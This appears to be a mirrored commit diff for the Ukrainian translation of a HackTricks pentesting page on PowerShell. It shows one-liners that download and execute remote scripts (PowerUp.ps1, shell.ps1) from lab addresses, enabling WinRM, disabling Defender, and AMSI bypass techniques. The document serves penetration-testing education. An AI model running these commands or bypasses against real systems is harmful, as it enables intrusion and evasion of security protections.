mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/windows-hardening/basic-powershell-for-pentesters/READM
This commit is contained in:
Translator
parent
84b8bfa001
commit
8c7592efe0
@ -18,7 +18,6 @@ Get-Command -Module <modulename>
|
||||
```
|
||||
## Завантажити та виконати
|
||||
```powershell
|
||||
g
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||||
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
|
||||
@ -71,7 +70,7 @@ PS> powershell -EncodedCommand <Base64>
|
||||
|
||||
## [AppLocker Policy](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)
|
||||
|
||||
## Увімкнути WinRM (Remote PS)
|
||||
## Увімкнути WinRM (Віддалений PS)
|
||||
```powershell
|
||||
enable-psremoting -force #This enables winrm
|
||||
|
||||
@ -85,7 +84,7 @@ $_
|
||||
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
|
||||
}
|
||||
```
|
||||
## Вимкнення Захисника
|
||||
## Вимкнення Защитника
|
||||
```powershell
|
||||
# Check status
|
||||
Get-MpComputerStatus
|
||||
@ -117,7 +116,7 @@ ValueData : 0
|
||||
|
||||
**`amsi.dll`** завантажується у ваш процес і має необхідні **експорти** для взаємодії з будь-яким додатком. І оскільки він завантажений у пам'яті процесу, який ви **контролюєте**, ви можете змінити його поведінку, **перезаписуючи інструкції в пам'яті**. Це дозволяє не виявляти нічого.
|
||||
|
||||
Отже, мета обходів AMSI полягає в тому, щоб **перезаписати інструкції цього DLL у пам'яті, щоб зробити виявлення безглуздим**.
|
||||
Отже, мета обходів AMSI, які ви будете використовувати, полягає в тому, щоб **перезаписати інструкції цього DLL у пам'яті, щоб зробити виявлення безглуздим**.
|
||||
|
||||
**Генератор обходу AMSI** веб-сторінка: [**https://amsi.fail/**](https://amsi.fail/)
|
||||
```powershell
|
||||
@ -168,7 +167,7 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
|
||||
|
||||
Check [**this post for detailed info and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Вступ:
|
||||
|
||||
Ця нова техніка базується на підключенні викликів API методів .NET. Як виявилося, методи .NET потрібно компілювати в рідні машинні інструкції в пам'яті, які в кінцевому підсумку виглядають дуже схоже на рідні методи. Ці скомпільовані методи можуть бути підключені, щоб змінити потік управління програми.
|
||||
Ця нова техніка базується на підключенні викликів API методів .NET. Як виявилося, методи .NET потрібно компілювати в рідні машинні інструкції в пам'яті, які в кінцевому підсумку виглядають дуже схоже на рідні методи. Ці скомпільовані методи можуть бути підключені для зміни потоку управління програми.
|
||||
|
||||
Кроки для виконання підключення викликів API методів .NET:
|
||||
|
||||
@ -181,7 +180,7 @@ Check [**this post for detailed info and the code**](https://practicalsecurityan
|
||||
|
||||
### AMSI Bypass 3 - SeDebug Privilege
|
||||
|
||||
[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) ви можете побачити, як з достатніми привілеями для налагодження процесів ви можете запустити процес powershell.exe, налагодити його, спостерігати, коли він завантажує `amsi.dll`, і вимкнути його.
|
||||
[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) ви можете побачити, як з достатніми привілеями для налагодження процесів ви можете запустити процес powershell.exe, налагоджувати його, контролювати, коли він завантажує `amsi.dll`, і вимкнути його.
|
||||
|
||||
### AMSI Bypass - More Resources
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user